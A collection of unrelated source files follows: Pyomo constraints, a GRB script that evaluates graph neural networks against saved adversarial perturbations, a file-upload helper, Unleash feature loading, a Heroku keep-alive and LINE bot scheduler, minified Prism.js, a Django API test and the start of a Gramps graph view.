m.c1098 = Constraint(expr= m.b504 - m.b528 >= 0)
m.c1099 = Constraint(expr= m.b505 - m.b529 >= 0)
m.c1100 = Constraint(expr= m.b506 - m.b530 >= 0)
m.c1101 = Constraint(expr= m.b507 - m.b531 >= 0)
m.c1102 = Constraint(expr= m.b508 - m.b532 >= 0)
m.c1103 = Constraint(expr= m.b509 - m.b533 >= 0)
m.c1104 = Constraint(expr= m.b510 - m.b534 >= 0)
m.c1105 = Constraint(expr= m.b511 - m.b535 >= 0)
m.c1106 = Constraint(expr= m.b512 - m.b536 >= 0)
m.c1107 = Constraint(expr= m.b513 - m.b537 >= 0)
m.c1108 = Constraint(expr= m.b514 - m.b538 >= 0)
m.c1109 = Constraint(expr= m.b515 - m.b539 >= 0)
m.c1110 = Constraint(expr= m.b516 - m.b540 >= 0)
m.c1111 = Constraint(expr= m.b517 - m.b541 >= 0)
m.c1112 = Constraint(expr= m.b514 - m.b542 >= 0)
m.c1113 = Constraint(expr= m.b515 - m.b543 >= 0)
m.c1114 = Constraint(expr= m.b516 - m.b544 >= 0)
m.c1115 = Constraint(expr= m.b517 - m.b545 >= 0)
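# A minimal sketch (not part of the generated model) of how the pairwise
# "at most one" constraints above could be written programmatically: the
# binaries b546..b605 are handled in blocks of four, and every pair inside a
# block is forced to sum to at most 1 (each pair once; the generated file
# repeats some of them).  The block bounds below are assumptions read off the
# constraints above.
#
#   from itertools import combinations
#   m.pairwise = ConstraintList()
#   for start in range(546, 606, 4):
#       for i, j in combinations(range(start, start + 4), 2):
#           m.pairwise.add(getattr(m, 'b%d' % i) + getattr(m, 'b%d' % j) <= 1)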
|
import argparse
import os
import pickle
import sys
import numpy as np
import pandas as pd
import scipy.sparse as sp
sys.path.append('../')
import grb.utils as utils
from grb.dataset import Dataset
from grb.evaluator import AttackEvaluator
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Evaluating adversarial attack against GNNs')
parser.add_argument("--gpu", type=int, default=0, help="gpu")
parser.add_argument("--dataset", type=str, default="grb-cora")
parser.add_argument("--dataset_mode", nargs='+', default=["easy", "medium", "hard", "full"])
parser.add_argument("--feat_norm", type=str, default=None)
parser.add_argument("--data_dir", type=str, default="../data/grb-cora/")
parser.add_argument("--model", nargs='+', default=None)
parser.add_argument("--model_dir", type=str, default="../saved_models/grb-cora/")
parser.add_argument("--model_file", type=str, default="checkpoint.pt")
parser.add_argument("--config_dir", type=str, default="./grb-cora")
parser.add_argument("--attack_dir", type=str, default="../results/grb-cora/")
parser.add_argument("--attack_adj_name", type=str, default="adj.pkl")
parser.add_argument("--attack_feat_name", type=str, default="features.npy")
parser.add_argument("--weight_type", type=str, default="polynomial",
help="Type of weighted accuracy, 'polynomial' or 'arithmetic'.")
parser.add_argument("--save_dir", type=str, default=None)
args = parser.parse_args()
if args.gpu >= 0:
device = "cuda:{}".format(args.gpu)
else:
device = "cpu"
sys.path.append(args.config_dir)
import config
result_dict = {"no_attack": {}}
if args.attack_dir:
for attack_name in config.attack_list:
result_dict[attack_name] = {}
for dataset_mode in args.dataset_mode:
dataset = Dataset(name=args.dataset,
data_dir=args.data_dir,
mode=dataset_mode,
feat_norm=args.feat_norm,
verbose=True)
adj = dataset.adj
features = dataset.features
labels = dataset.labels
num_nodes = dataset.num_nodes
num_features = dataset.num_features
num_classes = dataset.num_classes
train_mask = dataset.train_mask
val_mask = dataset.val_mask
test_mask = dataset.test_mask
if args.model is not None:
model_list = args.model
else:
model_list = config.model_list
model_dict = {}
for model_name in model_list:
# Corresponding model path
model_dict[model_name] = os.path.join(args.model_dir, model_name, args.model_file)
attack_dict = {}
for attack_name in config.attack_list:
for model_sur in config.model_sur_list:
attack_dict[attack_name] = os.path.join(args.attack_dir,
attack_name + "_vs_" + model_sur +
"_" + dataset_mode)
if args.save_dir is not None:
if not os.path.exists(args.save_dir):
os.makedirs(args.save_dir)
evaluator = AttackEvaluator(dataset=dataset,
build_model=config.build_model,
device=device)
adj_no = sp.csr_matrix(adj)
features_no = utils.feat_preprocess(features=features, device=device)
test_score_dict = evaluator.eval_attack(model_dict=model_dict,
adj_attack=adj_no,
features_attack=features_no)
result_dict["no_attack"][dataset_mode] = test_score_dict
if args.attack_dir:
test_score_dfs_tmp = []
for attack_name in attack_dict:
print("Evaluating {} attack..........".format(attack_name))
features_attack = np.load(os.path.join(attack_dict[attack_name], args.attack_feat_name))
with open(os.path.join(attack_dict[attack_name], args.attack_adj_name), 'rb') as f:
adj_attack = pickle.load(f)
adj_attack = sp.csr_matrix(adj_attack)
adj_attacked = sp.vstack([adj, adj_attack[:, :num_nodes]])
adj_attacked = sp.hstack([adj_attacked, adj_attack.T])
adj_attacked = sp.csr_matrix(adj_attacked)
features_attacked = np.concatenate([features, features_attack])
features_attacked = utils.feat_preprocess(features=features_attacked, device=device)
test_score_dict = evaluator.eval_attack(model_dict=model_dict,
adj_attack=adj_attacked,
features_attack=features_attacked)
result_dict[attack_name][dataset_mode] = test_score_dict
sorted_result_keys = sorted(result_dict, key=lambda x: (result_dict[x]['full']['weighted']))
result_df = pd.DataFrame.from_dict({(i, j): result_dict[i][j]
for i in sorted_result_keys
for j in result_dict[i].keys()},
orient='index')
    # Calculate model-wise scores: 'average', '3-min', 'weighted'
eval_dict = {'average': {}, '3-min': {}, 'weighted': {}}
for i, dataset_mode in enumerate(args.dataset_mode):
for key in eval_dict.keys():
eval_dict[key][dataset_mode] = {}
for model_name in model_list:
model_score_sorted = sorted(list(result_df[model_name][i::len(args.dataset_mode)].values))
eval_dict['average'][dataset_mode][model_name] = np.mean(model_score_sorted)
eval_dict['3-min'][dataset_mode][model_name] = np.mean(model_score_sorted[:3])
            eval_dict['weighted'][dataset_mode][model_name] = evaluator.eval_metric(
                model_score_sorted, metric_type=args.weight_type, order='d')
sorted_eval_keys = sorted(eval_dict['weighted']['full'],
key=lambda x: (eval_dict['weighted']['full'][x]),
reverse=True)
eval_df = pd.DataFrame.from_dict({(i, j): eval_dict[i][j]
for i in eval_dict.keys()
for j in eval_dict[i].keys()},
orient='index')
result_df = result_df.append(eval_df)
result_df = result_df[sorted_eval_keys + list(result_df.columns)[-3:]]
for name in result_df.columns:
result_df[name] = pd.to_numeric(result_df[name] * 100,
errors='ignore').map('{:,.2f}'.format)
if args.save_dir is not None:
result_dict.update(eval_dict)
utils.save_dict_to_json(result_dict=result_dict,
file_dir=args.save_dir,
file_name="{}.json".format(args.dataset))
utils.save_df_to_xlsx(df=result_df,
file_dir=args.save_dir,
file_name="{}.xlsx".format(args.dataset),
verbose=True)
utils.save_df_to_csv(df=result_df,
file_dir=args.save_dir,
file_name="{}.csv".format(args.dataset))
print("Test scores saved in {}.".format(args.save_dir))
else:
pd.set_option('display.width', 1000)
print(result_df)
print("Evaluation finished.")
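# Example invocation (a sketch: the script file name, model names and the save
# directory are assumptions; the flags mirror the argparse options defined above):
#
#   python evaluate_attack.py --dataset grb-cora \
#       --data_dir ../data/grb-cora/ \
#       --model_dir ../saved_models/grb-cora/ \
#       --attack_dir ../results/grb-cora/ \
#       --model gcn graphsage \
#       --save_dir ../results/eval/grb-cora/
#
# When --save_dir is given, the scores are written as <dataset>.json,
# <dataset>.xlsx and <dataset>.csv in that directory; otherwise the score table
# is printed to stdout.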
|
export default async function handleUpload (data) {
const file = data
try {
    const fileContents = await readUploadedFileAsText(file)
return fileContents
} catch (e) {
console.warn(e.message)
}
}
function readUploadedFileAsText (inputFile) {
const temporaryFileReader = new FileReader()
return new Promise((resolve, reject) => {
temporaryFileReader.onerror = () => {
temporaryFileReader.abort()
reject(new DOMException('Problem parsing input file.'))
}
temporaryFileReader.onload = () => {
resolve(temporaryFileReader.result)
}
temporaryFileReader.readAsText(inputFile)
})
}
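// A minimal usage sketch (assumed wiring, not part of this module): read the
// first file selected in a hypothetical <input type="file" id="file-input">
// element and log its text content.
//
//   import handleUpload from './handleUpload'
//
//   document.querySelector('#file-input').addEventListener('change', async (event) => {
//     const text = await handleUpload(event.target.files[0])
//     console.log(text)
//   })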
|
from fcache.cache import FileCache
from UnleashClient.features.Feature import Feature
from UnleashClient.variants.Variants import Variants
from UnleashClient.constants import FEATURES_URL
from UnleashClient.utils import LOGGER
# pylint: disable=broad-except
def _create_strategies(provisioning: dict,
strategy_mapping: dict) -> list:
feature_strategies = []
for strategy in provisioning["strategies"]:
try:
if "parameters" in strategy.keys():
strategy_provisioning = strategy['parameters']
else:
strategy_provisioning = {}
if "constraints" in strategy.keys():
constraint_provisioning = strategy['constraints']
else:
constraint_provisioning = {}
feature_strategies.append(strategy_mapping[strategy['name']](constraints=constraint_provisioning, parameters=strategy_provisioning))
except Exception as excep:
LOGGER.warning("Failed to load strategy. This may be a problem with a custom strategy. Exception: %s",
excep)
return feature_strategies
def _create_feature(provisioning: dict,
strategy_mapping: dict) -> Feature:
if "strategies" in provisioning.keys():
parsed_strategies = _create_strategies(provisioning, strategy_mapping)
else:
parsed_strategies = []
if "variants" in provisioning:
variant = Variants(provisioning['variants'], provisioning['name'])
else:
variant = None
return Feature(name=provisioning["name"],
enabled=provisioning["enabled"],
strategies=parsed_strategies,
variants=variant
)
def load_features(cache: FileCache,
feature_toggles: dict,
strategy_mapping: dict) -> None:
"""
    Load feature toggles into memory from the cached provisioning.
    :param cache: Should be the cache class variable from the UnleashClient instance.
    :param feature_toggles: Should be the features class variable from the UnleashClient instance.
    :param strategy_mapping: Dict mapping strategy names to strategy classes/callables.
:return:
"""
# Pull raw provisioning from cache.
try:
feature_provisioning = cache[FEATURES_URL]
# Parse provisioning
parsed_features = {}
feature_names = [d["name"] for d in feature_provisioning["features"]]
for provisioning in feature_provisioning["features"]:
parsed_features[provisioning["name"]] = provisioning
# Delete old features/cache
for feature in list(feature_toggles.keys()):
if feature not in feature_names:
del feature_toggles[feature]
# Update existing objects
for feature in feature_toggles.keys():
feature_for_update = feature_toggles[feature]
strategies = parsed_features[feature]["strategies"]
feature_for_update.enabled = parsed_features[feature]["enabled"]
if strategies:
parsed_strategies = _create_strategies(parsed_features[feature], strategy_mapping)
feature_for_update.strategies = parsed_strategies
if 'variants' in parsed_features[feature]:
feature_for_update.variants = Variants(
parsed_features[feature]['variants'],
parsed_features[feature]['name']
)
# Handle creation or deletions
new_features = list(set(feature_names) - set(feature_toggles.keys()))
for feature in new_features:
feature_toggles[feature] = _create_feature(parsed_features[feature], strategy_mapping)
except KeyError as cache_exception:
LOGGER.warning("Cache Exception: %s", cache_exception)
LOGGER.warning("Unleash client does not have cached features. Please make sure client can communicate with Unleash server!")
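# A minimal usage sketch (assumptions: the cache already holds the raw
# provisioning payload under FEATURES_URL, "unleash_cache" is a hypothetical
# cache name, and DefaultStrategy stands in for whatever class is registered
# for the "default" strategy):
#
#   cache = FileCache("unleash_cache")
#   cache[FEATURES_URL] = {"features": [{"name": "my-toggle", "enabled": True, "strategies": []}]}
#   feature_toggles = {}
#   load_features(cache, feature_toggles, strategy_mapping={"default": DefaultStrategy})
#   # feature_toggles now maps toggle names to Feature objects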
|
from apscheduler.schedulers.blocking import BlockingScheduler
from linebot import LineBotApi
from linebot.models import TextSendMessage
import urllib.request
import os
sched = BlockingScheduler()
# Periodically ping the URL so the service does not go idle
@sched.scheduled_job('cron', day_of_week='mon-sun', minute='*/25')
def keep_alive_job():
url = "https://{Your Heroku App Name}.herokuapp.com/"
conn = urllib.request.urlopen(url)
for key, value in conn.getheaders():
print(key, value)
    print("ping")
# Every day (Mon-Sun) at 8:30, use the Line-Bot to push a message; the target can be a User or a Group
@sched.scheduled_job('cron', day_of_week='mon-sun', hour=8, minute=30)
def daily_push_job():
line_bot_api = LineBotApi(os.environ['CHANNEL_ACCESS_TOKEN'])
# push message to one user or Group
    line_bot_api.push_message('Person or Group ID', TextSendMessage(text='The message you want to send'))
# Every Wednesday at 10:00, use the Line-Bot to push a message; the target can be a User or a Group
@sched.scheduled_job('cron', day_of_week='wed', hour=10)
def weekly_push_job():
line_bot_api = LineBotApi(os.environ['CHANNEL_ACCESS_TOKEN'])
# push message to one user or Group
    line_bot_api.push_message('Person or Group ID', TextSendMessage(text='The message you want to send'))
sched.start()
|
/* http://prismjs.com/download.html?themes=prism&languages=clike+javascript+json */
var _self="undefined"!=typeof window?window:"undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?self:{},Prism=function(){var e=/\blang(?:uage)?-(\w+)\b/i,t=0,n=_self.Prism={manual:_self.Prism&&_self.Prism.manual,util:{encode:function(e){return e instanceof a?new a(e.type,n.util.encode(e.content),e.alias):"Array"===n.util.type(e)?e.map(n.util.encode):e.replace(/&/g,"&").replace(/</g,"<").replace(/\u00a0/g," ")},type:function(e){return Object.prototype.toString.call(e).match(/\[object (\w+)\]/)[1]},objId:function(e){return e.__id||Object.defineProperty(e,"__id",{value:++t}),e.__id},clone:function(e){var t=n.util.type(e);switch(t){case"Object":var a={};for(var r in e)e.hasOwnProperty(r)&&(a[r]=n.util.clone(e[r]));return a;case"Array":return e.map(function(e){return n.util.clone(e)})}return e}},languages:{extend:function(e,t){var a=n.util.clone(n.languages[e]);for(var r in t)a[r]=t[r];return a},insertBefore:function(e,t,a,r){r=r||n.languages;var i=r[e];if(2==arguments.length){a=arguments[1];for(var l in a)a.hasOwnProperty(l)&&(i[l]=a[l]);return i}var o={};for(var s in i)if(i.hasOwnProperty(s)){if(s==t)for(var l in a)a.hasOwnProperty(l)&&(o[l]=a[l]);o[s]=i[s]}return n.languages.DFS(n.languages,function(t,n){n===r[e]&&t!=e&&(this[t]=o)}),r[e]=o},DFS:function(e,t,a,r){r=r||{};for(var i in e)e.hasOwnProperty(i)&&(t.call(e,i,e[i],a||i),"Object"!==n.util.type(e[i])||r[n.util.objId(e[i])]?"Array"!==n.util.type(e[i])||r[n.util.objId(e[i])]||(r[n.util.objId(e[i])]=!0,n.languages.DFS(e[i],t,i,r)):(r[n.util.objId(e[i])]=!0,n.languages.DFS(e[i],t,null,r)))}},plugins:{},highlightAll:function(e,t){var a={callback:t,selector:'code[class*="language-"], [class*="language-"] code, code[class*="lang-"], [class*="lang-"] code'};n.hooks.run("before-highlightall",a);for(var r,i=a.elements||document.querySelectorAll(a.selector),l=0;r=i[l++];)n.highlightElement(r,e===!0,a.callback)},highlightElement:function(t,a,r){for(var i,l,o=t;o&&!e.test(o.className);)o=o.parentNode;o&&(i=(o.className.match(e)||[,""])[1].toLowerCase(),l=n.languages[i]),t.className=t.className.replace(e,"").replace(/\s+/g," ")+" language-"+i,o=t.parentNode,/pre/i.test(o.nodeName)&&(o.className=o.className.replace(e,"").replace(/\s+/g," ")+" language-"+i);var s=t.textContent,u={element:t,language:i,grammar:l,code:s};if(n.hooks.run("before-sanity-check",u),!u.code||!u.grammar)return u.code&&(n.hooks.run("before-highlight",u),u.element.textContent=u.code,n.hooks.run("after-highlight",u)),n.hooks.run("complete",u),void 0;if(n.hooks.run("before-highlight",u),a&&_self.Worker){var g=new Worker(n.filename);g.onmessage=function(e){u.highlightedCode=e.data,n.hooks.run("before-insert",u),u.element.innerHTML=u.highlightedCode,r&&r.call(u.element),n.hooks.run("after-highlight",u),n.hooks.run("complete",u)},g.postMessage(JSON.stringify({language:u.language,code:u.code,immediateClose:!0}))}else u.highlightedCode=n.highlight(u.code,u.grammar,u.language),n.hooks.run("before-insert",u),u.element.innerHTML=u.highlightedCode,r&&r.call(t),n.hooks.run("after-highlight",u),n.hooks.run("complete",u)},highlight:function(e,t,r){var i=n.tokenize(e,t);return a.stringify(n.util.encode(i),r)},matchGrammar:function(e,t,a,r,i,l,o){var s=n.Token;for(var u in a)if(a.hasOwnProperty(u)&&a[u]){if(u==o)return;var g=a[u];g="Array"===n.util.type(g)?g:[g];for(var c=0;c<g.length;++c){var h=g[c],f=h.inside,d=!!h.lookbehind,m=!!h.greedy,p=0,y=h.alias;if(m&&!h.pattern.global){var 
v=h.pattern.toString().match(/[imuy]*$/)[0];h.pattern=RegExp(h.pattern.source,v+"g")}h=h.pattern||h;for(var b=r,k=i;b<t.length;k+=t[b].length,++b){var w=t[b];if(t.length>e.length)return;if(!(w instanceof s)){h.lastIndex=0;var _=h.exec(w),P=1;if(!_&&m&&b!=t.length-1){if(h.lastIndex=k,_=h.exec(e),!_)break;for(var A=_.index+(d?_[1].length:0),j=_.index+_[0].length,x=b,O=k,S=t.length;S>x&&(j>O||!t[x].type&&!t[x-1].greedy);++x)O+=t[x].length,A>=O&&(++b,k=O);if(t[b]instanceof s||t[x-1].greedy)continue;P=x-b,w=e.slice(k,O),_.index-=k}if(_){d&&(p=_[1].length);var A=_.index+p,_=_[0].slice(p),j=A+_.length,N=w.slice(0,A),C=w.slice(j),E=[b,P];N&&(++b,k+=N.length,E.push(N));var I=new s(u,f?n.tokenize(_,f):_,y,_,m);if(E.push(I),C&&E.push(C),Array.prototype.splice.apply(t,E),1!=P&&n.matchGrammar(e,t,a,b,k,!0,u),l)break}else if(l)break}}}}},tokenize:function(e,t){var a=[e],r=t.rest;if(r){for(var i in r)t[i]=r[i];delete t.rest}return n.matchGrammar(e,a,t,0,0,!1),a},hooks:{all:{},add:function(e,t){var a=n.hooks.all;a[e]=a[e]||[],a[e].push(t)},run:function(e,t){var a=n.hooks.all[e];if(a&&a.length)for(var r,i=0;r=a[i++];)r(t)}}},a=n.Token=function(e,t,n,a,r){this.type=e,this.content=t,this.alias=n,this.length=0|(a||"").length,this.greedy=!!r};if(a.stringify=function(e,t,r){if("string"==typeof e)return e;if("Array"===n.util.type(e))return e.map(function(n){return a.stringify(n,t,e)}).join("");var i={type:e.type,content:a.stringify(e.content,t,r),tag:"span",classes:["token",e.type],attributes:{},language:t,parent:r};if("comment"==i.type&&(i.attributes.spellcheck="true"),e.alias){var l="Array"===n.util.type(e.alias)?e.alias:[e.alias];Array.prototype.push.apply(i.classes,l)}n.hooks.run("wrap",i);var o=Object.keys(i.attributes).map(function(e){return e+'="'+(i.attributes[e]||"").replace(/"/g,""")+'"'}).join(" ");return"<"+i.tag+' class="'+i.classes.join(" ")+'"'+(o?" "+o:"")+">"+i.content+"</"+i.tag+">"},!_self.document)return _self.addEventListener?(_self.addEventListener("message",function(e){var t=JSON.parse(e.data),a=t.language,r=t.code,i=t.immediateClose;_self.postMessage(n.highlight(r,n.languages[a],a)),i&&_self.close()},!1),_self.Prism):_self.Prism;var r=document.currentScript||[].slice.call(document.getElementsByTagName("script")).pop();return r&&(n.filename=r.src,n.manual||r.hasAttribute("data-manual")||("loading"!==document.readyState?window.requestAnimationFrame?window.requestAnimationFrame(n.highlightAll):window.setTimeout(n.highlightAll,16):document.addEventListener("DOMContentLoaded",n.highlightAll))),_self.Prism}();"undefined"!=typeof module&&module.exports&&(module.exports=Prism),"undefined"!=typeof global&&(global.Prism=Prism);
Prism.languages.clike={comment:[{pattern:/(^|[^\\])\/\*[\s\S]*?(?:\*\/|$)/,lookbehind:!0},{pattern:/(^|[^\\:])\/\/.*/,lookbehind:!0}],string:{pattern:/(["'])(\\(?:\r\n|[\s\S])|(?!\1)[^\\\r\n])*\1/,greedy:!0},"class-name":{pattern:/((?:\b(?:class|interface|extends|implements|trait|instanceof|new)\s+)|(?:catch\s+\())[a-z0-9_\.\\]+/i,lookbehind:!0,inside:{punctuation:/(\.|\\)/}},keyword:/\b(if|else|while|do|for|return|in|instanceof|function|new|try|throw|catch|finally|null|break|continue)\b/,"boolean":/\b(true|false)\b/,"function":/[a-z0-9_]+(?=\()/i,number:/\b-?(?:0x[\da-f]+|\d*\.?\d+(?:e[+-]?\d+)?)\b/i,operator:/--?|\+\+?|!=?=?|<=?|>=?|==?=?|&&?|\|\|?|\?|\*|\/|~|\^|%/,punctuation:/[{}[\];(),.:]/};
Prism.languages.javascript=Prism.languages.extend("clike",{keyword:/\b(as|async|await|break|case|catch|class|const|continue|debugger|default|delete|do|else|enum|export|extends|finally|for|from|function|get|if|implements|import|in|instanceof|interface|let|new|null|of|package|private|protected|public|return|set|static|super|switch|this|throw|try|typeof|var|void|while|with|yield)\b/,number:/\b-?(0[xX][\dA-Fa-f]+|0[bB][01]+|0[oO][0-7]+|\d*\.?\d+([Ee][+-]?\d+)?|NaN|Infinity)\b/,"function":/[_$a-zA-Z\xA0-\uFFFF][_$a-zA-Z0-9\xA0-\uFFFF]*(?=\()/i,operator:/-[-=]?|\+[+=]?|!=?=?|<<?=?|>>?>?=?|=(?:==?|>)?|&[&=]?|\|[|=]?|\*\*?=?|\/=?|~|\^=?|%=?|\?|\.{3}/}),Prism.languages.insertBefore("javascript","keyword",{regex:{pattern:/(^|[^\/])\/(?!\/)(\[[^\]\r\n]+]|\\.|[^\/\\\[\r\n])+\/[gimyu]{0,5}(?=\s*($|[\r\n,.;})]))/,lookbehind:!0,greedy:!0}}),Prism.languages.insertBefore("javascript","string",{"template-string":{pattern:/`(?:\\\\|\\?[^\\])*?`/,greedy:!0,inside:{interpolation:{pattern:/\$\{[^}]+\}/,inside:{"interpolation-punctuation":{pattern:/^\$\{|\}$/,alias:"punctuation"},rest:Prism.languages.javascript}},string:/[\s\S]+/}}}),Prism.languages.markup&&Prism.languages.insertBefore("markup","tag",{script:{pattern:/(<script[\s\S]*?>)[\s\S]*?(?=<\/script>)/i,lookbehind:!0,inside:Prism.languages.javascript,alias:"language-javascript"}}),Prism.languages.js=Prism.languages.javascript;
Prism.languages.json={property:/"(?:\\.|[^\\"])*"(?=\s*:)/gi,string:/"(?!:)(?:\\.|[^\\"])*"(?!:)/g,number:/\b-?(0x[\dA-Fa-f]+|\d*\.?\d+([Ee][+-]?\d+)?)\b/g,punctuation:/[{}[\]);,]/g,operator:/:/g,"boolean":/\b(true|false)\b/gi,"null":/\bnull\b/gi},Prism.languages.jsonp=Prism.languages.json;
|
from django.urls import reverse
from rest_framework import status
from rest_framework.test import force_authenticate
from core.models import UserModel
from recycle.models import CommercialRequest
from recycle.views.commercial_order import CommercialOrderDetailsAPIView
from tests.unittests.common import APIFactoryTestCase
class CommercialOrderDetailsAPITestCase(APIFactoryTestCase):
def setUp(self) -> None:
super(CommercialOrderDetailsAPITestCase, self).setUp()
self.user = UserModel.objects.get(username='CommercialUser')
self.commercial_user_2 = UserModel.objects.get(username='CommercialUser2')
self.view = CommercialOrderDetailsAPIView.as_view()
self.expected_commercial_order = CommercialRequest.objects.filter(user=self.user).first()
def test_GetInfo(self):
request = self.request_factory.get(reverse('api_v1:recycle:get_commercial_order', args=[self.expected_commercial_order.id]))
force_authenticate(request, self.user)
response = self.view(request, pk=self.expected_commercial_order.id)
self.assertEqual(response.status_code, status.HTTP_200_OK)
actual_commercial_order = response.data
self.assertEqual(actual_commercial_order['id'], self.expected_commercial_order.id)
self.assertEqual(self.expected_commercial_order.address, actual_commercial_order['address'])
self.assertEqual(self.expected_commercial_order.date.strftime('%Y-%m-%d'), actual_commercial_order['date'])
self.assertEqual(self.expected_commercial_order.garbage_type, actual_commercial_order['garbage_type'])
self.assertEqual(self.expected_commercial_order.mass, actual_commercial_order['mass'])
self.assertEqual(self.expected_commercial_order.status, actual_commercial_order['status'])
self.assertEqual(self.expected_commercial_order.location.id, actual_commercial_order['location_id'])
self.assertEqual(self.expected_commercial_order.user.id, actual_commercial_order['user_id'])
def test_NotFoundExistent(self):
request = self.request_factory.get(
reverse('api_v1:recycle:get_commercial_order', args=[self.expected_commercial_order.id]))
force_authenticate(request, self.commercial_user_2)
response = self.view(request, pk=self.expected_commercial_order.id)
self.assertEqual(response.status_code, status.HTTP_404_NOT_FOUND)
|
# -*- coding: utf-8 -*-
#
# Gramps - a GTK+/GNOME based genealogy program
#
# Copyright (C) 2010-2012 Gary Burton
# GraphvizSvgParser is based on the Gramps XML import
# DotSvgGenerator is based on the relationship graph
# report.
# Mouse panning is derived from the pedigree view
# Copyright (C) 2012 Mathieu MD
# Copyright (C) 2015- Serge Noiraud
# Copyright (C) 2016- Ivan Komaritsyn
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
# $Id$
#-------------------------------------------------------------------------
#
# Python modules
#
#-------------------------------------------------------------------------
import os
import logging
from re import MULTILINE, findall
from xml.parsers.expat import ParserCreate
import string
from subprocess import Popen, PIPE
from io import StringIO
from threading import Thread
from math import sqrt, pow
from html import escape
from collections import abc
import gi
from gi.repository import Gtk, Gdk, GdkPixbuf, GLib, Pango
#-------------------------------------------------------------------------
#
# Gramps Modules
#
#-------------------------------------------------------------------------
from gramps.gen import datehandler
from gramps.gen.config import config
from gramps.gen.constfunc import win
from gramps.gen.db import DbTxn
from gramps.gen.display.name import displayer
from gramps.gen.display.place import displayer as place_displayer
from gramps.gen.errors import WindowActiveError
from gramps.gen.lib import (Person, Family, ChildRef, Name, Surname,
ChildRefType, EventType, EventRoleType)
from gramps.gen.utils.alive import probably_alive
from gramps.gen.utils.callback import Callback
from gramps.gen.utils.db import (get_birth_or_fallback, get_death_or_fallback,
find_children, find_parents, preset_name,
find_witnessed_people)
from gramps.gen.utils.file import search_for, media_path_full, find_file
from gramps.gen.utils.libformatting import FormattingHelper
from gramps.gen.utils.thumbnails import get_thumbnail_path
from gramps.gui.dialog import (OptionDialog, ErrorDialog, QuestionDialog2,
WarningDialog)
from gramps.gui.display import display_url
from gramps.gui.editors import EditPerson, EditFamily, EditTagList
from gramps.gui.utils import (color_graph_box, color_graph_family,
rgb_to_hex, hex_to_rgb_float,
process_pending_events)
from gramps.gui.views.navigationview import NavigationView
from gramps.gui.views.bookmarks import PersonBookmarks
from gramps.gui.views.tags import OrganizeTagsDialog
from gramps.gui.widgets import progressdialog as progressdlg
from gramps.gui.widgets.menuitem import add_menuitem
from gramps.gen.utils.symbols import Symbols
from gramps.gui.pluginmanager import GuiPluginManager
from gramps.gen.plug import CATEGORY_QR_PERSON, CATEGORY_QR_FAMILY
from gramps.gui.plug.quick import run_report
from gramps.gen.const import GRAMPS_LOCALE as glocale
try:
_trans = glocale.get_addon_translator(__file__)
except ValueError:
_trans = glocale.translation
_ = _trans.gettext
if win():
DETACHED_PROCESS = 8
try:
gi.require_version('GooCanvas', '2.0')
from gi.repository import GooCanvas
except ImportError:
raise Exception("Goocanvas 2 (http://live.gnome.org/GooCanvas) is "
"required for this view to work")
if os.sys.platform == "win32":
_DOT_FOUND = search_for("dot.exe")
else:
_DOT_FOUND = search_for("dot")
if not _DOT_FOUND:
raise Exception("GraphViz (http://www.graphviz.org) is "
"required for this view to work")
SPLINE = {0: 'false', 1: 'true', 2: 'ortho'}
WIKI_PAGE = 'https://gramps-project.org/wiki/index.php?title=Graph_View'
# gtk version
gtk_version = float("%s.%s" % (Gtk.MAJOR_VERSION, Gtk.MINOR_VERSION))
#-------------------------------------------------------------------------
#
# GraphView modules
#
#-------------------------------------------------------------------------
import sys
sys.path.append(os.path.abspath(os.path.dirname(__file__)))
from search_widget import SearchWidget, Popover, ListBoxRow, get_person_tooltip
from avatars import Avatars
#-------------------------------------------------------------------------
#
# GraphView
#
#-------------------------------------------------------------------------
class GraphView(NavigationView):
"""
View for pedigree tree.
Displays the ancestors and descendants of a selected individual.
"""
# default settings in the config file
CONFIGSETTINGS = (
('interface.graphview-show-images', True),
('interface.graphview-show-avatars', True),
('interface.graphview-avatars-style', 1),
('interface.graphview-avatars-male', ''), # custom avatar
('interface.graphview-avatars-female', ''), # custom avatar
('interface.graphview-show-full-dates', False),
('interface.graphview-show-places', False),
('interface.graphview-place-format', 0),
('interface.graphview-show-lines', 1),
('interface.graphview-show-tags', False),
('interface.graphview-highlight-home-person', True),
('interface.graphview-home-path-color', '#000000'),
('interface.graphview-descendant-generations', 10),
('interface.graphview-ancestor-generations', 3),
('interface.graphview-show-animation', True),
('interface.graphview-animation-speed', 3),
('interface.graphview-animation-count', 4),
('interface.graphview-search-all-db', True),
('interface.graphview-search-show-images', True),
('interface.graphview-search-marked-first', True),
('interface.graphview-ranksep', 5),
('interface.graphview-nodesep', 2),
('interface.graphview-person-theme', 0),
('interface.graphview-font', ['', 14]),
('interface.graphview-show-all-connected', False))
def __init__(self, pdata, dbstate, uistate, nav_group=0):
NavigationView.__init__(self, _('Graph View'), pdata, dbstate, uistate,
PersonBookmarks, nav_group)
self.show_images = self._config.get('interface.graphview-show-images')
self.show_full_dates = self._config.get(
'interface.graphview-show-full-dates')
self.show_places = self._config.get('interface.graphview-show-places')
self.show_tag_color = self._config.get('interface.graphview-show-tags')
self.highlight_home_person = self._config.get(
'interface.graphview-highlight-home-person')
self.home_path_color = self._config.get(
'interface.graphview-home-path-color')
self.descendant_generations = self._config.get(
'interface.graphview-descendant-generations')
self.ancestor_generations = self._config.get(
'interface.graphview-ancestor-generations')
self.dbstate = dbstate
self.uistate = uistate
self.graph_widget = None
self.dbstate.connect('database-changed', self.change_db)
        # dict {handle: tooltip_str} of tooltips in markup format
self.tags_tooltips = {}
        # for disabling animation options in the config dialog
self.ani_widgets = []
        # for hiding custom avatar options in the config dialog
self.avatar_widgets = []
self.additional_uis.append(self.additional_ui)
self.define_print_actions()
self.uistate.connect('font-changed', self.font_changed)
def on_delete(self):
"""
Method called on shutdown.
See PageView class (../gramps/gui/views/pageview.py).
"""
super().on_delete()
        # stop search so the app can close properly
self.graph_widget.search_widget.stop_search()
def font_changed(self):
self.graph_widget.font_changed(self.get_active())
#self.goto_handle(None)
def define_print_actions(self):
"""
Associate the print button to the PrintView action.
"""
